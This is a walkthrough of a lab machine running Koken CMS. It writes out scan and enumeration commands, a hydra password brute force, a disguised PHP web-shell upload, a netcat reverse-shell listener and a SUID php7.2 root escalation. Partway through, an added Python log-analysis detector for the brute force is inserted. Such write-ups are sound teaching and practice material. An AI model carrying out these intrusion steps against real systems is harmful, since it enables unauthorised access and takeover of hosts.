Initial foothold
1. Network discovery
nmap -sn 10.0.2.27/24
My target is 10.0.2.47.
2. Port scan
nmap -Pn 10.0.2.47
nmap -Pn -p1000- 10.0.2.47
3. OS and service scan
nmap -A -p80,139,445,8000 10.0.2.47
Here are the discovered services:
- 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
- 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
- 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
- 8000/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Enumeration
1. HTTP on port 80
nikto scan
nikto -h http://10.0.2.47
Directory scan
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -q
gobuster dir --wordlist /usr/share/dirb/wordlists/big.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -q
gobuster dir --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -q
Access the site
View page source. Possible username revealed.
2. SMB on port 139 and 445
Scan the service
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.2.47
I got an accessible directory.
Access “sambashare” and download files
smbclient //10.0.2.47/sambashare
dir
get mailsent.txt
get wordpress.bkp.zip
exit
Read the file
cat mailsent.txt
I got usernames and emails.
Create user.txt
Create mail.txt
Read wordpress.bkp.zip
unzip wordpress.bkp.zip
ls -la
cd wordpress
ls -la
cat wp-config-sample.php
There's a credential, but I doubt that I can use it. It's Portuguese.
3. HTTP on port 8000
I tried to scan directories using gobuster, but I couldn't scan it.
Use dirbuster instead
There’s /admin directory.
Access the site; this site is built with Koken.
View page source, not much revealed.
Searching for a Koken CMS exploit, I came across this. However, I need a credential to exploit it.
Access /admin. It's a login page. It also needs an email, which I already saved as mail.txt.
Test input
I got an error message. I will use this to crack the password with hydra.
Intercept the request w/ Burp Suite.
Crack the password w/ hydra
hydra -L mail.txt -P ~/Desktop/rockyou.txt 10.0.2.47 -s 8000 http-post-form "/api.php?/sessions:email=^USER^&password=^PASS^:F=Incorrect. Try again or reset your password." -V -F -u
I got the credential.
Access the site.
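As an added defensive example (not part of the original write-up): the hydra command above detects failures by matching the "Incorrect. Try again..." message rather than an HTTP status code, so a detector for this brute force should not rely on status codes either. The Python below flags any source that POSTs to Koken's /api.php?/sessions endpoint ten or more times within a sliding one-minute window, run over constructed Apache access-log lines (the IPs, timestamps and user agent are made up for the sample).

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" log format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
LOGIN_PATH = "/api.php?/sessions"  # Koken login endpoint targeted by the hydra run

def parse_line(line):
    # Parse one access-log line into a dict, or return None if it does not match.
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def find_login_bursts(lines, threshold=10, window_seconds=60):
    """Return {ip: peak_count} for sources that POST to LOGIN_PATH at least
    `threshold` times within any `window_seconds` sliding window.
    Status codes are deliberately ignored: the failure is signalled in the
    response body, so request rate per source is the reliable signal."""
    recent = defaultdict(deque)  # ip -> timestamps of recent login POSTs
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != LOGIN_PATH:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()  # drop timestamps that fell out of the window
        if len(q) >= threshold:
            alerts[rec["ip"]] = max(alerts.get(rec["ip"], 0), len(q))
    return alerts

def _line(ip, sec, method="POST", path=LOGIN_PATH):
    # Build a constructed log line (sample data, not a real capture).
    return (f'{ip} - - [20/Jul/2020:10:15:{sec:02d} +0000] "{method} {path} HTTP/1.1" '
            f'200 312 "-" "Mozilla/5.0"')

# Constructed sample: one host hits the login 12 times in 22 s, another logs in normally.
SAMPLE_LOG = ([_line("10.0.2.15", s) for s in range(0, 24, 2)]
              + [_line("10.0.2.30", 5), _line("10.0.2.30", 40), _line("10.0.2.30", 41, "GET", "/admin")])

if __name__ == "__main__":
    print(find_login_bursts(SAMPLE_LOG))  # {'10.0.2.15': 12}
```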
Exploitation
1. Follow the exploit guide. Create a shell file and save it as "image.php.jpg"
2. Import the file
3. Intercept w/ Burp and edit the request
Intercept w/ Burp
Edit the request and forward
Verify upload process
Copy the link
Paste it into the browser and test the shell by supplying the "id" command
4. Reverse shell
Prepare listener on port 443
rlwrap nc -lvp 443
Intercept the shell request and send to the repeater.
I will use command from this cheat sheet.
Encode the command to URL w/ Burp Suite’s decoder.
Paste it to cmd parameter and send the request.
Back to listener, now I got the shell.
Privilege Escalation
1. Get a TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
2. Explore the directory. I came across interesting files as listed:
cat /var/www/html/koken/storage/configuration/database.php
cat /home/daisa/user.txt
3. Verify SUID
find / -perm -u=s -type f 2>/dev/null
I noticed php7.2
Search in GTFOBins
Follow the guide
CMD="/bin/sh"
/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
whoami
Now I’m root.